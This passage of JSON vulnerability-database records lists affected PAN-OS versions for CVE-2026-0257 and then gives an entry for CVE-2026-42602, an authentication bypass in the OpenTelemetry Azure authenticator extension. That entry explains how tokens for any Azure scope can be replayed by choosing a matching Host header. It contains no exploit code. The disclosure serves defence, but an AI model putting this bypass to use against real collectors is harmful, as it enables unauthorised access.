0:*:*:*:*:*:*:*","matchCriteriaId":"CB628D07-9AB0-4C19-8DA3-DBE5689A3F40"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.1:*:*:*:*:*:*:*","matchCriteriaId":"3A94EA8A-EADF-416D-AE54-3CF56214714C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:*:*:*:*:*:*:*","matchCriteriaId":"BC05CBD3-7679-4640-9BE4-FD5418D9F756"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:*:*:*:*:*:*:*","matchCriteriaId":"7F383C3D-0C7A-4B5E-9798-D1CE9632687B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:-:*:*:*:*:*:*","matchCriteriaId":"DF83EAA1-49E1-4AD0-A049-F1B3065950BC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h1:*:*:*:*:*:*","matchCriteriaId":"BE3F7369-9F35-409A-9F47-45A959592DFA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h13:*:*:*:*:*:*","matchCriteriaId":"FD701663-4C57-4115-BD59-9DFFB504E2AF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h15:*:*:*:*:*:*","matchCriteriaId":"82816C09-6A9D-4AB2-AA55-62CC714CCA82"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h16:*:*:*:*:*:*","matchCriteriaId":"9AA9F77D-BC9C-4A2C-8988-6DEE65CD9C8E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h17:*:*:*:*:*:*","matchCriteriaId":"A5A3CEBF-9F8A-47F9-A302-7C395F2A8146"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h18:*:*:*:*:*:*","matchCriteriaId":"A79B51D2-74E8-4BA3-AE33-829A9C1776E9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h25:*:*:*:*:*:*","matchCriteriaId":"E08297B1-95E9-4730-B59D-252B958C4199"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h27:*:*:*:*:*:*","matchCriteriaId":"B56B153E-8693-4257-9E33-38904A949ED8"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h32:*:*:*:*:*:*","matchCriteriaId":"A220ED95-5E1A-45AA-85BD-8A58CFC6C697"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h4:*:*:*:*:*:*","matchCriteriaId":"E9DB4DA9-2262-4E9E-B3A1-49D261D01295"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h7:*:*:*:*:*:*","matchCriteriaId":"4852E738-990C-4DD2-8252-D4625D843A99"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h9:*:*:*:*:*:*","matchCriteriaId":"CB2C59F8-2583-4510-90F8-500F8329AFFD"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.5:*:*:*:*:*:*:*","matchCriteriaId":"7C31ACD7-46AB-4092-89F3-7B4C9B642199"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:-:*:*:*:*:*:*","matchCriteriaId":"52C50A07-F4D8-4F1F-BA61-3429BB1721BE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h1:*:*:*:*:*:*","matchCriteriaId":"9D12FF27-C186-467C-8627-1284EBC67243"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h10:*:*:*:*:*:*","matchCriteriaId":"AF4AA997-35BC-4BC1-9EF2-644503B2D806"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h14:*:*:*:*:*:*","matchCriteriaId":"12EF4DDF-9773-4B02-8FF4-F94A1D49E6AA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h17:*:*:*:*:*:*","matchCriteriaId":"8FAE17BB-7938-41D0-8D62-46F829C647BC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h19:*:*:*:*:*:*","matchCriteriaId":"6DA5A0AD-C4FB-4210-8651-F94F2875A0EA"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h2:*:*:*:*:*:*","matchCriteriaId":"45D633D7-A4B5-4D68-9BAB-D9BA25877F36"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h20:*:*:*:*:*:*","matchCriteriaId":"B79DB477-A907-4300-A651-16F93880B049"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h21:*:*:*:*:*:*","matchCriteriaId":"AF74D8FA-677F-484D-9338-A1761614FFD6"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h22:*:*:*:*:*:*","matchCriteriaId":"F9FC5118-4056-4E22-A1F0-D6FFA2B88472"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h23:*:*:*:*:*:*","matchCriteriaId":"5E7A808F-F52F-4786-950C-591CCADB2EE4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h25:*:*:*:*:*:*","matchCriteriaId":"0CA82012-AA59-44C1-BB9D-0B28764D507E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h29:*:*:*:*:*:*","matchCriteriaId":"27233F80-A620-42D3-927D-4FCDE6345456"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h3:*:*:*:*:*:*","matchCriteriaId":"63729FA6-ED2A-4593-9436-232F282A0A78"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h4:*:*:*:*:*:*","matchCriteriaId":"F39792EF-61B5-4874-9FD0-7544F8C5C0D4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h5:*:*:*:*:*:*","matchCriteriaId":"CCC24BCD-E508-4553-9BAC-468A1078C9A2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h6:*:*:*:*:*:*","matchCriteriaId":"4A06B6F4-DCAE-4115-93D4-25D0A37AAB9F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h7:*:*:*:*:*:*","matchCriteriaId":"91529C45-FA55-4844-A153-682F729F440D"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:-:*:*:*:*:*:*","matchCriteriaId":"64B56778-2698-493D-80AD-B4AE81F48124"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:h1:*:*:*:*:*:*","matchCriteriaId":"0A9D3E2E-BA37-4F2A-BD43-97DD93E43D08"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:h2:*:*:*:*:*:*","matchCriteriaId":"9DCE8F6C-541E-4C61-ABC8-4A618B0DD58D"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.7:h4:*:*:*:*:*:*","matchCriteriaId":"1E5EF79B-1A25-4AAB-AF2E-D151359E7FFE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.8:*:*:*:*:*:*:*","matchCriteriaId":"7193CCDA-D5D4-41D2-A808-87EDC19F2F49"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.9:*:*:*:*:*:*:*","matchCriteriaId":"D58FF578-775A-4BC0-9975-2C8B8E51B1E1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:-:*:*:*:*:*:*","matchCriteriaId":"A92886DF-C989-47AD-8F68-8F468BBC6E57"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h1:*:*:*:*:*:*","matchCriteriaId":"9893920B-A00E-4890-A897-EE1CF0751BA0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h10:*:*:*:*:*:*","matchCriteriaId":"D1289923-12D8-4FDD-B18B-C52516F14922"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h12:*:*:*:*:*:*","matchCriteriaId":"AFC923D7-672D-4556-8344-BBD285324067"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h21:*:*:*:*:*:*","matchCriteriaId":"E1510DE9-04A3-4E08-872D-C0F6041BCFCD"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h4:*:*:*:*:*:*","matchCriteriaId":"31CD3B15-2CE0-404A-9542-9C39B8E71027"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h5:*:*:*:*:*:*","matchCriteriaId":"0194DA0B-041A-4810-8BFB-2308290517B3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h7:*:*:*:*:*:*","matchCriteriaId":"69E64D86-034F-4BC7-9A4E-2703D834EBC1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.10:h9:*:*:*:*:*:*","matchCriteriaId":"B992628F-1114-4FC8-9364-800ACE997044"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.11:*:*:*:*:*:*:*","matchCriteriaId":"73CF31A0-82EC-45DF-87DD-81C458AAF94C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.12:*:*:*:*:*:*:*","matchCriteriaId":"77024A63-A28F-4467-8D4C-3CFD41724777"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:-:*:*:*:*:*:*","matchCriteriaId":"9223B0D4-6194-4684-8EF4-84A0EF511D8F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:h1:*:*:*:*:*:*","matchCriteriaId":"CB16C018-2B70-4F4D-9025-69FF82CD40F0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:h2:*:*:*:*:*:*","matchCriteriaId":"1259B519-130D-4584-86AA-E4EA1E89ACB2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.13:h3:*:*:*:*:*:*","matchCriteriaId":"0DCA6D54-E623-4985-B35F-AC98299828EF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.1.14:-:*:*:*:*:*:*","matchCriteriaId":"20A38461-BC7E-4D75-A168-FA493955A54C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.0:*:*:*:*:*:*:*","matchCriteriaId":"AF9D96B4-E4D2-4F35-A4AF-D79BB9F3A41B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.1:*:*:*:*:*:*:*","matchCriteriaId":"DAF8163D-1EE5-4955-A317-1BC95581C87D"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.2:*:*:*:*:*:*:*","matchCriteriaId":"AEEE3CF8-1B67-44D3-8FF1-9EC6C5197835"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.3:*:*:*:*:*:*:*","matchCriteriaId":"A6DFD05F-0A72-45E0-8D20-E1C28642C973"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:-:*:*:*:*:*:*","matchCriteriaId":"C01AD190-F3C2-4349-A063-8C5C78B725B9"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h1:*:*:*:*:*:*","matchCriteriaId":"30F4CD1C-6862-4279-8D2D-40B4D164222F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h10:*:*:*:*:*:*","matchCriteriaId":"8137F3AF-BA32-41BC-AD2E-A668FFA33892"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h11:*:*:*:*:*:*","matchCriteriaId":"8C977AF0-D2B0-401A-A7C5-A1C71AC3C072"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h12:*:*:*:*:*:*","matchCriteriaId":"B9C0A53F-2AFE-4B0D-AEC1-464E6001E02F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h14:*:*:*:*:*:*","matchCriteriaId":"D720448D-F40B-4C92-9101-A48AC36C9CBF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h15:*:*:*:*:*:*","matchCriteriaId":"5F12F7AC-D5B3-499E-87DA-27427D8BFFC5"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h2:*:*:*:*:*:*","matchCriteriaId":"A52B7A7A-483A-4075-B1E9-5C14B66F7FC3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h4:*:*:*:*:*:*","matchCriteriaId":"76949F0F-2ADC-492F-83F0-0A1B0E861F97"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h5:*:*:*:*:*:*","matchCriteriaId":"C1DD83BC-4E8E-4C1D-80C7-A6209B4E70CE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h6:*:*:*:*:*:*","matchCriteriaId":"73888909-64C5-41BC-BAE0-BD9BDEEAF723"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h7:*:*:*:*:*:*","matchCriteriaId":"E7861D82-815D-4894-9E11-1B6B1E66CDEC"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h8:*:*:*:*:*:*","matchCriteriaId":"D269E33D-9A79-40CC-B79A-C9A398AB7AFE"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:h9:*:*:*:*:*:*","matchCriteriaId":"9762E441-856F-466F-812C-798CA2EEF965"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.5:*:*:*:*:*:*:*","matchCriteriaId":"0EF09924-12F7-4F76-9FD0-08AF707AA289"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.6:*:*:*:*:*:*:*","matchCriteriaId":"C62D458B-2BC0-4E0C-8E95-894674DBD791"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:-:*:*:*:*:*:*","matchCriteriaId":"0A25C9D9-BC83-49AE-BEE7-EF05F8336B01"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h1:*:*:*:*:*:*","matchCriteriaId":"A93C2B58-EC78-4C3D-89FF-35D9C489E39F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h10:*:*:*:*:*:*","matchCriteriaId":"A32E35C0-913E-4348-8AD4-E1F169C40C92"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h11:*:*:*:*:*:*","matchCriteriaId":"39112398-2A93-4E26-A7DF-0E3FA81C5130"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h12:*:*:*:*:*:*","matchCriteriaId":"C88442D1-599F-411D-B7A2-E17AA839F177"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h13:*:*:*:*:*:*","matchCriteriaId":"B3B538CC-6EA0-4555-B828-18A55997F454"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h2:*:*:*:*:*:*","matchCriteriaId":"D12C3EB6-842E-4378-896C-FDBB2BC75D10"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h3:*:*:*:*:*:*","matchCriteriaId":"86B41903-FF08-454D-B626-184CB73B122E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h4:*:*:*:*:*:*","matchCriteriaId":"396DC378-7716-40F6-88A4-99299A16CAF1"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h7:*:*:*:*:*:*","matchCriteriaId":"5E5C6E3A-262C-4212-B21C-00E8079AA8CF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h8:*:*:*:*:*:*","matchCriteriaId":"4C855108-D3C9-4DE3-B9F4-9735A0A439AF"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.8:*:*:*:*:*:*:*","matchCriteriaId":"5B887380-062F-45B2-9F25-861227E86377"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.9:*:*:*:*:*:*:*","matchCriteriaId":"02713C77-26D8-4C84-A8B2-86B6BA5BE600"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:-:*:*:*:*:*:*","matchCriteriaId":"051673AB-50BF-4DD0-8679-F5825520241A"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h1:*:*:*:*:*:*","matchCriteriaId":"BAC15D8A-83CA-413F-BA2B-17EC2B169F6E"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h2:*:*:*:*:*:*","matchCriteriaId":"70B3EB0C-87F1-46C2-B95C-C5808E473BD2"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h3:*:*:*:*:*:*","matchCriteriaId":"073BF631-451B-4DFC-B23C-F0F68C2450F0"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h4:*:*:*:*:*:*","matchCriteriaId":"13AA1BEF-F2F6-4534-89F3-DF4E79217978"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h5:*:*:*:*:*:*","matchCriteriaId":"CBFDE611-4981-4D92-ABAF-858DF132535F"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.10:h6:*:*:*:*:*:*","matchCriteriaId":"AAEA66F4-81AC-49C3-81B1-65EF5F16951A"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.11:-:*:*:*:*:*:*","matchCriteriaId":"CE68AC6C-61B6-4245-96AE-3D1F96D44721"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.2:*:*:*:*:*:*:*","matchCriteriaId":"7A116B32-5798-47EC-A22D-D3E960B29C07"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.3:*:*:*:*:*:*:*","matchCriteriaId":"F1725F67-BF14-48B4-A405-1CCA507CD553"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:-:*:*:*:*:*:*","matchCriteriaId":"8C1ADE94-3F05-48EE-94E0-FD6EB682705C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:h2:*:*:*:*:*:*","matchCriteriaId":"F727C18E-1C8D-448A-954C-073294FBC65C"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:h3:*:*:*:*:*:*","matchCriteriaId":"7E492BE6-EB2E-4616-85EA-3B389741301B"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.4:h5:*:*:*:*:*:*","matchCriteriaId":"E5F85240-989D-4E2D-B2D0-F0F35E0590A4"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.5:*:*:*:*:*:*:*","matchCriteriaId":"FB597850-D759-4062-974D-C33B1BA62BE3"},{"vulnerable":true,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:12.1.6:*:*:*:*:*:*:*","matchCriteriaId":"1507AE7A-A685-464F-BB0F-1868244A36C8"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:paloaltonetworks:prisma_access:-:*:*:*:*:*:*:*","matchCriteriaId":"FFB6FBC7-DEEB-4571-BCF9-92345A4B614A"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*","versionStartIncluding":"10.2.0","versionEndExcluding":"10.2.10","matchCriteriaId":"ECC53672-829D-4995-A75A-CE8D3C38A3A3"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*","versionStartIncluding":"11.2.0","versionEndExcluding":"11.2.7","matchCriteriaId":"A589C841-0E91-4A4E-9A90-8000C4AAB8EE"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:*:*:*:*:*:*","matchCriteriaId":"03C5ABF2-8C53-4376-8A64-6CB34E18E77C"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:*","matchCriteriaId":"FF7FCD8B-80DF-4004-A9D2-4EE884F089A6"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h12:*:*:*:*:*:*","matchCriteriaId":"83C9637A-B615-4CC2-84AA-BDCFE611484C"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h14:*:*:*:*:*:*","matchCriteriaId":"224270A7-767D-433B-AD51-C031506747C1"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h17:*:*:*:*:*:*","matchCriteriaId":"A532EFC6-A883-4279-8C05-9CD600B3F963"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h18:*:*:*:*:*:*","matchCriteriaId":"F4F20C02-DF90-4609-9254-B765481C83E0"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:*:*:*:*:*:*","matchCriteriaId":"872BC747-512A-4872-AC86-E7F1DC589F47"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h21:*:*:*:*:*:*","matchCriteriaId":"E5E36C87-E01D-49DC-AB73-10E5EE27F596"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h27:*:*:*:*:*:*","matchCriteriaId":"39437442-B24D-492F-B637-2203492327FC"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:*:*:*:*:*:*","matchCriteriaId":"67F527D0-F85B-4B83-AEA5-BA636FC89210"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h30:*:*:*:*:*:*","matchCriteriaId":"984BE1FB-ADB7-4831-AEDD-39DBAED078B0"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h31:*:*:*:*:*:*","matchCriteriaId":"AF2C954D-9763-41E3-A132-F83C82E79BC0"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:*:*:*:*:*:*","matchCriteriaId":"6CF8F985-7E51-49E6-857A-FAAF027F5611"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:*:*:*:*:*:*","matchCriteriaId":"B437DCEA-ABA3-41CA-B320-97EC430F1122"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:*:*:*:*:*:*","matchCriteriaId":"593AFE7A-CB37-4156-A2B8-646A317F3176"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:*:*:*:*:*:*","matchCriteriaId":"A9F032C2-3202-479B-8C70-277F6871A4A4"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:-:*:*:*:*:*:*","matchCriteriaId":"0A25C9D9-BC83-49AE-BEE7-EF05F8336B01"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h1:*:*:*:*:*:*","matchCriteriaId":"A93C2B58-EC78-4C3D-89FF-35D9C489E39F"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h10:*:*:*:*:*:*","matchCriteriaId":"A32E35C0-913E-4348-8AD4-E1F169C40C92"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h11:*:*:*:*:*:*","matchCriteriaId":"39112398-2A93-4E26-A7DF-0E3FA81C5130"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h12:*:*:*:*:*:*","matchCriteriaId":"C88442D1-599F-411D-B7A2-E17AA839F177"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h2:*:*:*:*:*:*","matchCriteriaId":"D12C3EB6-842E-4378-896C-FDBB2BC75D10"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h3:*:*:*:*:*:*","matchCriteriaId":"86B41903-FF08-454D-B626-184CB73B122E"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h4:*:*:*:*:*:*","matchCriteriaId":"396DC378-7716-40F6-88A4-99299A16CAF1"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h7:*:*:*:*:*:*","matchCriteriaId":"5E5C6E3A-262C-4212-B21C-00E8079AA8CF"},{"vulnerable":false,"criteria":"cpe:2.3:o:paloaltonetworks:pan-os:11.2.7:h8:*:*:*:*:*:*","matchCriteriaId":"4C855108-D3C9-4DE3-B9F4-9735A0A439AF"}]}]}],"references":[{"url":"https://security.paloaltonetworks.com/CVE-2026-0257","source":"psirt@paloaltonetworks.com","tags":["Vendor Advisory"]},{"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-0257","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["US Government Resource"]}]}},{"cve":{"id":"CVE-2026-42602","sourceIdentifier":"security-advisories@github.com","published":"2026-05-13T21:16:47.210","lastModified":"2026-06-01T13:47:32.807","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"azureauthextension is the Azure Authenticator Extension. From 0.124.0 to 0.150.0, a server-side authentication bypass in azureauthextension allows any party who holds a single valid Azure access token for any scope the collector's configured identity can mint for to authenticate to any OpenTelemetry receiver that uses auth: azure_auth. The extension's Authenticate method does not validate incoming bearer tokens as JWTs. Instead, it calls its own configured credential to obtain an access token and compares the client's token to the result with string equality — and the scope for that server-side token request is taken from the client-supplied Host header. As a result, a token minted for any Azure resource the service principal has ever been issued a token for (ARM, Graph, Key Vault, Storage, etc.) will authenticate to the collector if the attacker picks a matching Host. Tokens are replayable for the full issued lifetime (commonly several hours for managed identity tokens)."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-208"},{"lang":"en","value":"CWE-287"},{"lang":"en","value":"CWE-290"},{"lang":"en","value":"CWE-294"},{"lang":"en","value":"CWE-347"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:opentelemetry:opentelemetry_collector_contrib:*:*:*:*:*:go:*:*","versionStartIncluding":"0.124.0","versionEndIncluding":"0.150.0","matchCriteriaId":"DAF35C18-82FD-4D93-8424-E59866D90769"}]}]}],"references":[{"url":"https://github.com/open-telemetry/opentelemetry-collector-contrib/security/advisories/GHSA-pjv4-3c63-699f","source":"security-advisories@github.com","tags":["Exploit","Mitigation","Vendor Advisory"]},{"url":"https://github.com/open-telemetry/opentelemetry-collector-contrib/security/advisories/GHSA-pjv4-3c63-699f","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Mitigation","Vendor 